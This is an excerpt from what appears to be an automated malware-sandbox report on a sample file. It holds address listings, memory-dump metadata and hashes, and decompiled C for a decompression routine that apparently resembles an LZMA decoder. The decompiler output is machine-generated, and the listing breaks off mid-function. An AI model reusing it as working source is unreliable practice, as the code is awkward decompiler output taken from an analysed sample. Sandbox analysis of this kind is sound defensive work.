                                                  0x004065d6
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406604
                                                  0x0040660a
                                                  0x0040661c
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x004065d8
                                                  0x004065de
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x004069f0
                                                  0x004069f4
                                                  0x00406ba3
                                                  0x00406bb9
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00406bca
                                                  0x00406bd1
                                                  0x00406bd5
                                                  0x00406bd5
                                                  0x00406a00
                                                  0x00406a07
                                                  0x00406a0f
                                                  0x00406a12
                                                  0x00406a15
                                                  0x00406a15
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061c0
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00000000
                                                  0x004061d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004061da
                                                  0x004061dd
                                                  0x004061e0
                                                  0x004061e4
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ea
                                                  0x004061ed
                                                  0x004061ef
                                                  0x004061f0
                                                  0x004061f3
                                                  0x004061f5
                                                  0x004061f6
                                                  0x004061f8
                                                  0x004061fb
                                                  0x00406200
                                                  0x00406205
                                                  0x0040620e
                                                  0x00406221
                                                  0x00406224
                                                  0x00406230
                                                  0x00406258
                                                  0x0040625a
                                                  0x00406268
                                                  0x00406268
                                                  0x0040626c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625c
                                                  0x0040625c
                                                  0x0040625f
                                                  0x00406260
                                                  0x00406260
                                                  0x00000000
                                                  0x0040625c
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627f
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406333
                                                  0x00406335
                                                  0x00406338
                                                  0x004063a9
                                                  0x004063ac
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406343
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635b
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406370
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406380
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00000000
                                                  0x00406385
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638b
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00000000
                                                  0x0040639c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00406a21
                                                  0x00406a1b
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406518
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00000000
                                                  0x00406b6d
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b3
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x004066de
                                                  0x004066de
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406962
                                                  0x00406b97
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000
                                                  0x00406bce
                                                  0x00406a1b
                                                  0x004069a2
                                                  0x0040699f
                                                  0x00000000
                                                  0x004065d6

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                                  • Instruction ID: 1046eeffc13e12efe39df9970ac10e2b765b46b26c22898380a8ab994a27db31
                                                  • Opcode Fuzzy Hash: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                                  • Instruction Fuzzy Hash: 307124B1D00228CBDF24CF98C8447ADBBF1FB44305F15816AD856BB281D778AA96DF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004066F0 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004066F0() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
